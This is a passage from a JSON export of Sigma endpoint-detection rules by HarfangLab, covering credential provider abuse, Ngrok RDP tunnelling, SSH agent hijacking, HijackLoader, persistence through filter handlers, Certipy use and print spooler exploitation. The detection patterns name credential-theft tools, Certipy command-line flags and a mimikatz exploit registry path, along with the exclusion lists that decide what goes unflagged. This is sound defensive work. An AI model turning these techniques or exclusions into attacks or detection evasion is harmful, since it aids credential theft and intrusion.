Providers\\{B12744B8-5BB7-463a-B85E-BB7627E73002}\\(Default)'\n Details: 'acNamPwdCredProvider'\n\n exclusion_landesk:\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential Providers\\{D2EEC341-83A7-41BC-9407-FA6ED9991C09}\\(Default)'\n Details: 'LANDesk Credential Provider'\n\n exclusion_PwdMgmtProvider:\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential Providers\\{3DD6481A-A712-4c4c-88FF-6DDCAB28DE86}\\(Default)'\n Details: 'PwdMgmtProvider'\n\n exclusion_bomgar:\n ProcessCommandLine: '?:\\ProgramData\\bomgar-scc-0x????????\\bomgar-scc.exe -service:run'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n Details: 'cp'\n\n exclusion_baramundi:\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential Providers\\{14BF5F29-7118-438e-81B4-26007D34FCCF}\\(Default)'\n Details: 'baramundiAutoLogOnProvider'\n\n exclusion_rdagent:\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential Providers\\{f64945df-4fa9-4068-a2fb-61af319edd33}\\(Default)'\n Details: 'RdpCredentialProvider'\n\n exclusion_zonecentral:\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential Providers\\{00001043-8804-4CA8-8868-36F59DEFD14D}\\(Default)'\n Details: 'ZC Credential Provider'\n\n exclusion_evidian:\n ProcessImage|endswith: '\\WGSens.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'EVIDIAN SA'\n Details:\n - 'E-SSOPwdCredProvider'\n - 'E-SSOTokenCredProvider'\n - 'E-SSOBioCredProvider'\n - 'E-SSORFIDCredProvider'\n - 'E-SSOClusterCredProvider'\n - 'E-SSOResetSecretCredProvider'\n - 'E-SSOMobileCredProvider'\n\n exclusion_beyondtrust:\n ProcessSigned: 'true'\n ProcessSignature: 'Bomgar Corporation'\n ProcessImage|endswith: '\\bomgar-scc.exe'\n Details: 'cp'\n\n exclusion_imprivata:\n ProcessImage: '?:\\Program Files (x86)\\Imprivata\\OneSign Agent\\x64\\ISXCredProvDiag.exe'\n\n exclusion_imprivata_msiexec:\n TargetObject:\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential Providers\\{11660363-381B-42A5-893E-BBF09122F76A}\\(Default)'\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential Providers\\{11660363-56A3-B1C6-A65B-377AC634DC09}\\(Default)'\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential Providers\\{11660363-781C-617B-0100-128274950001}\\(Default)'\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential Providers\\{11660363-781C-617B-0100-128274950011}\\(Default)'\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential Providers\\{11660363-781C-617B-0100-128274950012}\\(Default)'\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential Providers\\{11660363-AB6B-83D3-9CDA-FB2DF5ED7435}\\(Default)'\n Details: 'OneSign Credential Provider'\n\n exclusion_cryhod:\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential Providers\\{00000038-8804-9CA8-8868-36F59DEFD14D}\\(Default)'\n Details: 'CY Credential Provider'\n\n exclusion_programfiles:\n Image|startswith:\n - '?:\\Program Files (x86)\\'\n - '?:\\Program Files\\'\n\n exclusion_msiexec:\n - ProcessImage:\n - '?:\\windows\\system32\\msiexec.exe'\n - '?:\\windows\\syswow64\\msiexec.exe'\n - ProcessParentImage:\n - '?:\\windows\\system32\\msiexec.exe'\n - '?:\\windows\\syswow64\\msiexec.exe'\n\n exclusion_userlocker:\n ProcessSigned: 'true'\n ProcessSignature: 'IS Decisions SA'\n ProcessImage: '?:\\Windows\\SysWOW64\\UlAgentExe.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "49c89875-fa13-4a83-a71b-911e70858184",
"rule_name": "New Credential Provider Installed",
"rule_description": "Detects the installation of a new credential provider.\nAttackers can install a new credential provider in order to obtain user credentials. For instance, Mimikatz has this feature.\nIt is recommended to analyze the DLL pointed to by the registry key and the process responsible for the registry modification to determine the legitimacy of this action.\n",
"rule_creation_date": "2021-06-17",
"rule_modified_date": "2025-04-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1003",
"attack.t1556.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "49ed1286-c309-4fb0-bcfc-67f8039069c4",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.628102Z",
"creation_date": "2026-03-23T11:45:34.628104Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.628108Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://twitter.com/malmoeb/status/1519710302820089857",
"https://www.huntress.com/blog/abusing-ngrok-hackers-at-the-end-of-the-tunnel",
"https://attack.mitre.org/software/S0508/",
"https://attack.mitre.org/techniques/T1572/",
"https://attack.mitre.org/techniques/T1090/",
"https://attack.mitre.org/techniques/T1567/"
],
"name": "t1090_ngrok_tunneling_source_address.yml",
"content": "title: RDP Logon via Ngrok Tunnel\nid: 49ed1286-c309-4fb0-bcfc-67f8039069c4\ndescription: |\n Detects the usage of Ngrok to connect to the local RDP service remotely.\n Ngrok is a tool that allows users to expose their local servers to the Internet, which enables attackers to tunnel malicious traffic through an otherwise secure network.\n It is recommended to investigate the activity of the user in the RDP session.\nreferences:\n - https://twitter.com/malmoeb/status/1519710302820089857\n - https://www.huntress.com/blog/abusing-ngrok-hackers-at-the-end-of-the-tunnel\n - https://attack.mitre.org/software/S0508/\n - https://attack.mitre.org/techniques/T1572/\n - https://attack.mitre.org/techniques/T1090/\n - https://attack.mitre.org/techniques/T1567/\ndate: 2023/02/12\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.s0508\n - attack.command_and_control\n - attack.t1090\n - attack.t1572\n - attack.exfiltration\n - attack.t1567\n - classification.Windows.Source.NetworkActivity\n - classification.Windows.Tool.Ngrok\n - classification.Windows.Behavior.CommandAndControl\n - classification.Windows.Behavior.Exfiltration\n - classification.Windows.Behavior.Tunneling\n - classification.Windows.Behavior.Lateralization\nlogsource:\n product: windows\n category: network_connection\ndetection:\n selection_network:\n SourceIp:\n - '::1'\n - '::ffff:7f00:1'\n - '127.0.0.1'\n - '::ffff:127.0.0.1'\n DestinationIp:\n - '::1'\n - '127.0.0.1'\n - '::ffff:7f00:1'\n - '::ffff:127.0.0.1'\n DestinationPort: '3389'\n Initiated: 'true'\n\n selection_proc:\n - ProcessImage|endswith: '\\ngrok.exe'\n - ProcessOriginalFileName: 'ngrok.exe'\n - ProcessProduct: 'ngrok agent'\n - ProcessImphash: 'FF9F3A86709796C17211F9DF12AAE74D'\n\n condition: all of selection_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "49ed1286-c309-4fb0-bcfc-67f8039069c4",
"rule_name": "RDP Logon via Ngrok Tunnel",
"rule_description": "Detects the usage of Ngrok to connect to the local RDP service remotely.\nNgrok is a tool that allows users to expose their local servers to the Internet, which enables attackers to tunnel malicious traffic through an otherwise secure network.\nIt is recommended to investigate the activity of the user in the RDP session.\n",
"rule_creation_date": "2023-02-12",
"rule_modified_date": "2026-02-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.exfiltration"
],
"rule_technique_tags": [
"attack.t1090",
"attack.t1567",
"attack.t1572"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "4a11a4e5-5039-4595-9c44-2407ad083066",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.612568Z",
"creation_date": "2026-03-23T11:45:34.612572Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.612579Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://embracethered.com/blog/posts/2022/ttp-diaries-ssh-agent-hijacking/",
"https://attack.mitre.org/techniques/T1563/001/"
],
"name": "t1563_001_ssh_session_hijacking_linux.yml",
"content": "title: SSH Session Hijacking (Linux)\nid: 4a11a4e5-5039-4595-9c44-2407ad083066\ndescription: |\n Detects the execution of the ssh binary with the SSH_AUTH_SOCKET variable being set to an ssh-agent UNIX socket in the command-line.\n Attackers may use this to query SSH Agent sockets of other users or services and leverage private keys for which they did not have access.\n It is recommended to investigate any traces of compromise in the machine where this SSH connection began, and to closely monitor the target machine to determine if the connection is malicious.\nreferences:\n - https://embracethered.com/blog/posts/2022/ttp-diaries-ssh-agent-hijacking/\n - https://attack.mitre.org/techniques/T1563/001/\ndate: 2024/03/04\nmodified: 2025/11/10\nauthor: HarfangLab\ntags:\n - attack.lateral_movement\n - attack.t1563.001\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Behavior.PrivilegeEscalation\n - classification.Linux.Behavior.Lateralization\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n CommandLine|contains:\n - 'SSH_AUTH_SOCK=/tmp/ssh-????/agent'\n - 'SSH_AUTH_SOCK=/tmp/ssh-?????/agent'\n - 'SSH_AUTH_SOCK=/tmp/ssh-??????/agent'\n - 'SSH_AUTH_SOCK=/tmp/ssh-???????/agent'\n - 'SSH_AUTH_SOCK=/tmp/ssh-????????/agent'\n - 'SSH_AUTH_SOCK=/tmp/ssh-?????????/agent'\n - 'SSH_AUTH_SOCK=/tmp/ssh-??????????/agent'\n - 'SSH_AUTH_SOCK=/tmp/ssh-???????????/agent'\n - 'SSH_AUTH_SOCK=/tmp/ssh-????????????/agent'\n\n exclusion_image:\n Image:\n - '/usr/bin/env'\n - '/usr/bin/systemctl'\n - '/usr/bin/echo'\n - '*/_bazel_steeve/*/process-wrapper'\n\n exclusion_env:\n CommandLine|contains|all:\n - 'DESKTOP_SESSION='\n - 'PATH=/usr/local/sbin:'\n - 'LANG='\n - 'PWD=/home/'\n - 'SSH_AGENT_PID='\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "4a11a4e5-5039-4595-9c44-2407ad083066",
"rule_name": "SSH Session Hijacking (Linux)",
"rule_description": "Detects the execution of the ssh binary with the SSH_AUTH_SOCKET variable being set to an ssh-agent UNIX socket in the command-line.\nAttackers may use this to query SSH Agent sockets of other users or services and leverage private keys for which they did not have access.\nIt is recommended to investigate any traces of compromise in the machine where this SSH connection began, and to closely monitor the target machine to determine if the connection is malicious.\n",
"rule_creation_date": "2024-03-04",
"rule_modified_date": "2025-11-10",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1563.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "4a1e6461-19e3-4d1c-98d6-49e65f012252",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.083062Z",
"creation_date": "2026-03-23T11:45:34.083064Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.083068Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1055/012/",
"https://www.zscaler.com/blogs/security-research/technical-analysis-hijackloader",
"https://www.crowdstrike.com/blog/hijackloader-expands-techniques/"
],
"name": "t1055_012_suspicious_file_execution_hijackloader.yml",
"content": "title: Execution Related to HijackLoader\nid: 4a1e6461-19e3-4d1c-98d6-49e65f012252\ndescription: |\n Detects the execution of the 32 bits version of more.com.\n HijackLoader executes the 32 bits version of more.com from the malware for process hollowing purposes.\n HijackLoader is a defense evasion oriented loader relying mostly on DLL Sideloading and a custom variant of Process Hollowing.\n It usually drops Stealers as final payloads.\n It is recommended to check any children of the more.com process and the activities of the parent for other malicious behavior.\nreferences:\n - https://attack.mitre.org/techniques/T1055/012/\n - https://www.zscaler.com/blogs/security-research/technical-analysis-hijackloader\n - https://www.crowdstrike.com/blog/hijackloader-expands-techniques/\ndate: 2024/09/16\nmodified: 2025/03/10\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1055.012\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Loader.HijackLoader\n - classification.Windows.Behavior.SacrificialProcess\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection_process:\n Image: '?:\\Windows\\SysWOW64\\more.com'\n ParentImage|endswith:\n - '\\setup.exe'\n - '\\Set-up.exe'\n\n selection_parent:\n ParentImage: '?:\\Windows\\SysWOW64\\more.com'\n\n filter_werfault:\n Image:\n - '?:\\Windows\\SysWOW64\\WerFault.exe'\n - '?:\\Windows\\System32\\WerFault.exe'\n CommandLine|contains: ' -u -p '\n\n condition: 1 of selection_* and not 1 of filter_*\nlevel: critical\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "4a1e6461-19e3-4d1c-98d6-49e65f012252",
"rule_name": "Execution Related to HijackLoader",
"rule_description": "Detects the execution of the 32 bits version of more.com.\nHijackLoader executes the 32 bits version of more.com from the malware for process hollowing purposes.\nHijackLoader is a defense evasion oriented loader relying mostly on DLL Sideloading and a custom variant of Process Hollowing.\nIt usually drops Stealers as final payloads.\nIt is recommended to check any children of the more.com process and the activities of the parent for other malicious behavior.\n",
"rule_creation_date": "2024-09-16",
"rule_modified_date": "2025-03-10",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1055.012"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "4a399726-1f85-453e-af29-8b49596803de",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.072388Z",
"creation_date": "2026-03-23T11:45:34.072390Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.072395Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://docs.microsoft.com/en-us/windows/win32/search/-search-ifilter-registering-filters",
"https://persistence-info.github.io/Data/ifilters.html",
"https://attack.mitre.org/techniques/T1546/"
],
"name": "t1546_persistence_filter_handlers.yml",
"content": "title: Possible Filter Handlers Persistence Added\nid: 4a399726-1f85-453e-af29-8b49596803de\ndescription: |\n Detects the creation or edition of the Filter Handlers registry keys that allows dll execution on specific file extension openings.\n This method is used as a means to achieve persistence by putting a malicious DLL as a filter handler.\n The DLL is loaded when a file of the extension is opened.\n It is recommended to investigate the process that sets the registry value for suspicious activities.\nreferences:\n - https://docs.microsoft.com/en-us/windows/win32/search/-search-ifilter-registering-filters\n - https://persistence-info.github.io/Data/ifilters.html\n - https://attack.mitre.org/techniques/T1546/\ndate: 2022/07/20\nmodified: 2025/03/31\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1546\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.SystemModification\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject|startswith:\n - 'HKLM\\Software\\Classes\\.*\\PersistentHandler'\n - 'HKLM\\Software\\Classes\\CLSID\\{????????-????-????-????-????????????}\\PersistentAddinsRegistered'\n\n filter_empty:\n Details:\n - '(Empty)'\n - ''\n\n condition: selection and not 1 of filter_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "4a399726-1f85-453e-af29-8b49596803de",
"rule_name": "Possible Filter Handlers Persistence Added",
"rule_description": "Detects the creation or edition of the Filter Handlers registry keys that allows dll execution on specific file extension openings.\nThis method is used as a means to achieve persistence by putting a malicious DLL as a filter handler.\nThe DLL is loaded when a file of the extension is opened.\nIt is recommended to investigate the process that sets the registry value for suspicious activities.\n",
"rule_creation_date": "2022-07-20",
"rule_modified_date": "2025-03-31",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1546"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "4a452d8f-d9b8-48d3-a992-b3b40e438513",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.091124Z",
"creation_date": "2026-03-23T11:45:34.091126Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.091130Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/ly4k/Certipy",
"https://posts.specterops.io/certified-pre-owned-d95910965cd2",
"https://attack.mitre.org/techniques/T1649"
],
"name": "t1649_local_certipy_execution.yml",
"content": "title: Local Certipy Execution\nid: 4a452d8f-d9b8-48d3-a992-b3b40e438513\ndescription: |\n Detects Certipy, an offensive tool for enumerating and abusing Active Directory Certificate Services (AD CS).\n AD CS is a Microsoft technology that provides public key infrastructure (PKI) functionality to create, manage, and distribute digital certificates.\n These certificates are used for various security protocols such as SSL/TLS, signing code, and encrypting emails or files.\n This rule detects different command-lines associated with the local usage of the Certipy tool which is used by adversaries to enumerate, manage and forge domain certificates.\n It is recommended to investigate the source of the offending processes to determine if the action taken with this tool was malicious\nreferences:\n - https://github.com/ly4k/Certipy\n - https://posts.specterops.io/certified-pre-owned-d95910965cd2\n - https://attack.mitre.org/techniques/T1649\ndate: 2024/07/11\nmodified: 2026/02/17\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1649\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.HackTool.Certipy\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_image:\n - OriginalFileName: 'certipy.exe'\n - Image|endswith: '\\certipy.exe'\n - Description|contains: 'certipy'\n\n selection_cmdline_1:\n CommandLine|contains|all:\n - ' -target '\n - ' -ca '\n - ' -upn '\n\n selection_cmdline_2:\n CommandLine|contains:\n - ' -ca-pfx '\n - ' -kirbi'\n - ' -old-bloodhound'\n - ' -bloodhound'\n - ' -vulnerable'\n\n selection_auth:\n CommandLine|contains|all:\n - ' auth '\n - ' -pfx '\n\n selection_ptt:\n CommandLine|contains|all:\n - ' ptt '\n - ' -req '\n - ' -u'\n\n relay_1:\n CommandLine|contains: ' relay '\n\n relay_2:\n CommandLine|contains:\n - ' -target '\n - ' -ca '\n\n account_1:\n CommandLine|contains|all:\n - ' account '\n - ' -u'\n\n account_2:\n CommandLine|contains:\n - ' create'\n - ' read'\n - ' update'\n - ' delete'\n\n shadow_1:\n CommandLine|contains: ' shadow '\n\n shadow_2:\n CommandLine|contains:\n - ' list'\n - ' add'\n - ' remove'\n - ' clear'\n - ' info'\n - ' auto'\n\n exclusion_microsoft:\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Microsoft Windows'\n - 'Microsoft Corporation'\n - 'Microsoft Windows Publisher'\n\n exclusion_dropbox:\n ProcessSigned: 'true'\n ProcessSignature: 'Dropbox, Inc'\n\n exclusion_certutil:\n CommandLine|contains: 'certutil '\n\n exclusion_pdf:\n CommandLine|endswith: '.pdf'\n\n exclusion_firefox:\n ProcessImage: '?:\\Program Files\\Mozilla Firefox\\firefox.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Mozilla Corporation'\n\n exclusion_git:\n - ProcessImage|endswith: '\\git.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Johannes Schindelin'\n - ProcessImage:\n - '?:\\Program Files\\Git\\bin\\bash.exe'\n - '?:\\Program Files\\Git\\usr\\bin\\bash.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\Programs\\Git\\bin\\bash.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\Programs\\Git\\usr\\bin\\bash.exe'\n - ProcessParentImage:\n - '?:\\Program Files\\Git\\bin\\bash.exe'\n - '?:\\Program Files\\Git\\usr\\bin\\bash.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\Programs\\Git\\bin\\bash.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\Programs\\Git\\usr\\bin\\bash.exe'\n\n exclusion_vlc:\n ProcessImage|endswith: '\\vlc.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'VideoLAN'\n\n exclusion_jetbrains:\n ProcessImage|endswith: '\\runnerw.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'JetBrains s.r.o.'\n\n exclusion_vscode:\n ParentImage:\n - '?:\\Program Files\\Microsoft VS Code\\Code.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\Programs\\Microsoft VS Code\\Code.exe'\n GrandparentImage:\n - '?:\\Program Files\\Microsoft VS Code\\Code.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\Programs\\Microsoft VS Code\\Code.exe'\n\n exclusion_irfanview:\n ParentImage: '?:\\Program Files\\IrfanView\\i_view64.exe'\n\n condition: (1 of selection_* or all of account_* or all of shadow_* or all of relay_*) and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "4a452d8f-d9b8-48d3-a992-b3b40e438513",
"rule_name": "Local Certipy Execution",
"rule_description": "Detects Certipy, an offensive tool for enumerating and abusing Active Directory Certificate Services (AD CS).\nAD CS is a Microsoft technology that provides public key infrastructure (PKI) functionality to create, manage, and distribute digital certificates.\nThese certificates are used for various security protocols such as SSL/TLS, signing code, and encrypting emails or files.\nThis rule detects different command-lines associated with the local usage of the Certipy tool which is used by adversaries to enumerate, manage and forge domain certificates.\nIt is recommended to investigate the source of the offending processes to determine if the action taken with this tool was malicious\n",
"rule_creation_date": "2024-07-11",
"rule_modified_date": "2026-02-17",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1649"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "4a77686d-2ab7-4cde-9662-336a29faed1a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.607466Z",
"creation_date": "2026-03-23T11:45:34.607469Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.607477Z",
"rule_level": "low",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1675",
"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675",
"https://attack.mitre.org/techniques/T1055/"
],
"name": "t1574_spoolsv_new_provider.yml",
"content": "title: Spoolsv Print Provider Added\nid: 4a77686d-2ab7-4cde-9662-336a29faed1a\ndescription: |\n Detects the installation of a new print provider.\n Attackers may install new print provider services to exploit vulnerabilities in the printer service (such as CVE-2021-1675) and gain code execution through the spoolsv binary.\n It is recommended to analyze the DLL pointed to by the registry value to determine its legitimacy, as well as to look for malicious actions originating from the spoolsv process.\nreferences:\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1675\n - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675\n - https://attack.mitre.org/techniques/T1055/\ndate: 2021/07/01\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1055\n - classification.Windows.Source.Registry\n - classification.Windows.Exploit.CVE-2021-1675\n - classification.Windows.Exploit.Spooler\n - classification.Windows.Behavior.Exploitation\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: 'SetValue'\n Image|endswith: '\\spoolsv.exe'\n # NOTE: spoolsv AddNewProvidor function is in charge of writting it.\n # HKLM\\System\\CurrentControlSet\\Control\\Print\\Environments\\Windows x64\\Drivers\\Version-3\\mimikatz-{438047e2-911d-4073-9be6-be3530c13385}-reallylegitprinter\\Configuration File\n TargetObject:\n - 'HKLM\\System\\CurrentControlSet\\Control\\Print\\Environments\\Windows x64\\Drivers\\Version-?\\\\*\\Configuration File'\n - 'HKLM\\System\\CurrentControlSet\\Control\\Print\\Environments\\Windows NT x86\\Drivers\\Version-?\\\\*\\Configuration File'\n - 'HKLM\\System\\CurrentControlSet\\Control\\Print\\Environments\\Windows ARM64\\Drivers\\Version-?\\\\*\\Configuration File'\n - 'HKLM\\System\\CurrentControlSet\\Control\\Print\\Environments\\Windows IA64\\Drivers\\Version-?\\\\*\\Configuration File'\n\n exclusion_empty:\n Details:\n - '(Empty)'\n - ''\n\n exclusion_legitimate_drivers:\n - Details:\n - 'PS5UI.DLL'\n - 'PS5UI.DLL?'\n TargetObject|endswith:\n - '\\Version-3\\Adobe PDF Converter\\Configuration File'\n - '\\Version-3\\BluebeamPSDriver\\Configuration File'\n - '\\Version-3\\PDF24\\Configuration File'\n 